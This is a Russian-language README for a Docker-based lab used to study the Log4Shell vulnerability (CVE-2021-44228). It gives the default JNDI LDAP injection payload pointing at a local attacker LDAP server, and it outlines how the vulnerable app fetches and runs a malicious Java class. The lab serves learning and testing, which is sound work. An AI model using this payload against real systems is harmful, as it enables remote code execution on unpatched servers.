CVE-2021-44228 (Log4Shell) Лабораторная среда для изучения уязвимости
Введение
Этот проект предоставляет среду на базе Docker для безопасной практики и понимания критической уязвимости Log4j, известной как CVE-2021-44228 (Log4Shell).
Ключевые возможности
- Безопасная среда тестирования на базе Docker
- Возможность тестирования собственных эксплойт-пейлоадов
- Включает LDAP-сервер атакующего и уязвимое Java-приложение
Начало работы
docker compose up --build
Тестирование пейлоадов
- Вы можете изменить пейлоад в тестовой секции файла
/vulnerable/Makefile
- Пейлоад по умолчанию использует
$${jndi:ldap://127.0.0.1:10000/}
Как это работает
- Уязвимое Java-приложение запускается
- LDAP-сервер атакующего прослушивает порт 10000
- Уязвимое приложение запускается
- Пейлоад Log4Shell записывается в журнал уязвимого приложения через тестовую секцию Makefile
- Уязвимое приложение выполняет JNDI LDAP-запрос
- LDAP-сервер возвращает вредоносный Java-класс
- Уязвимое приложение загружает и выполняет этот класс